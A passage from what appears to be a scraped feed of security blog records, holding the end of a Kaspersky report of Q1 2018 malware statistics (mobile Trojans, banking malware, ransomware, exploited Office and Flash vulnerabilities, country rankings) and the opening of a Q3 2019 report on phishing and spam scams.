technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "modified": "2018-05-14T10:00:30", "published": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-26T10:27:00", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### Amazon Prime\n\nIn Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September's Prime Day sale, such messages were plausible.\n\nScammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. Fearing their accounts may have been hacked, victims phoned the number \u2014 this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165224/spam-report-q3-2019-1.png>)\n\n### Scammers collect photos of documents and selfies\n\nThis quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165613/spam-report-q3-2019-2.png>)\n\nSome scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165142/spam-report-q3-2019-3.png>)\n\nTo obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165215/spam-report-q3-2019-4.png>)\n\n### YouTube and Instagram\n\nScammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube [ads](<https://www.kaspersky.com/blog/youtube-phishing-scam/25600/>) appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly \"satisfied customers\" were posted under the video. What's more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.\n\nAll the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small \"commission fee\" or payment to \"confirm the account\" was required.\n\nSimilar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.\n\n### Back to school\n\nIn Q3, we registered a series of attacks related in one way or another to education. Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.\n\nThe scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165645/spam-report-q3-2019-7.png>)\n\nOne way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165749/spam-report-q3-2019-8.png>)\n\nScammers also tried to steal usernames and passwords for the mail servers of educational service providers. To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165813/spam-report-q3-2019-9.png>)\n\n### Apple product 